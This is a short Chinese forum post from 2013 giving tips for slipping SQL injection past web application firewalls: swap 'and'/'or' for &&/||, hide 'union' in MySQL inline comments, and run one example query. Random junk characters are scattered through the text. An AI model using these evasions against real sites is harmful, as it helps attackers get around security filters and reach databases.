1.and 用&& 代替
* Y) L. X* L4 w/ X8 A. X2 r
$ Q8 O! V7 S& X+ z- n2. or 用||代替
- q* a) |3 s# N. P+ I9 \( C
. c( F- X. U7 p' T6 N3.union select from 变成 /*!union*/这种。$ I. [8 i. e: L3 q* F" C
+ l( q4 m# {1 O3 R一个例子:- X# ~9 U/ |& e y. a
" q+ N j! x4 v0 j/ select 1 /*!union*/ select 2 from adad where 1&&1+ T3 j9 _9 N0 O( ? y2 O5 |
1 P3 }1 |9 Y) W摘自 it_security
! o: R& R0 D$ W0 w3 u+ m1 f
; f0 R2 W+ O6 v$ q9 Z9 l绕过waf的一个思路
A0 X I" _0 @# w- G. O( H
9 X8 t# C! {$ @6 ]7 r |
发表于 2013-2-23 12:41:12
收藏
支持
反对